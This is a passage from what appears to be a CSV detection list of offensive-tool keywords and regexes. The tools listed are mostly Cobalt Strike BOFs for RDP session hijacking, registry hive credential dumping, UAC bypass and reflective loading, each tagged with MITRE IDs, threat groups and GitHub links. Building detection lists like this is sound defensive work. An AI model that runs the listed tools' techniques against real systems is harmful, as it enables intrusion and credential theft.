APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_load *",".{0,1000}bofnet_load\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_load *.*",".{0,1000}bofnet_load\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_shutdown*",".{0,1000}bofnet_shutdown.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOFNET_Tests*",".{0,1000}BOFNET_Tests.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofportscan *",".{0,1000}bofportscan\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*bof-quser *.*",".{0,1000}bof\-quser\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*bof-quser.cna*",".{0,1000}bof\-quser\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*bof-regsave *",".{0,1000}bof\-regsave\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*BofRunnerOutput*",".{0,1000}BofRunnerOutput.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*BOFs*/SyscallsSpawn/*",".{0,1000}BOFs.{0,1000}\/SyscallsSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*Bofs/AssemblyLoader*",".{0,1000}Bofs\/AssemblyLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bof-servicemove *",".{0,1000}bof\-servicemove\s.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*bof-trustedpath-uacbypass*",".{0,1000}bof\-trustedpath\-uacbypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*boko.py *",".{0,1000}boko\.py\s.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*bokoscanner.*",".{0,1000}bokoscanner\..{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*boku_pe_customMZ*",".{0,1000}boku_pe_customMZ.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_customPE*",".{0,1000}boku_pe_customPE.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_dll*",".{0,1000}boku_pe_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_mask_*",".{0,1000}boku_pe_mask_.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_MZ_from_C2Profile*",".{0,1000}boku_pe_MZ_from_C2Profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_strrep*",".{0,1000}boku_strrep.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 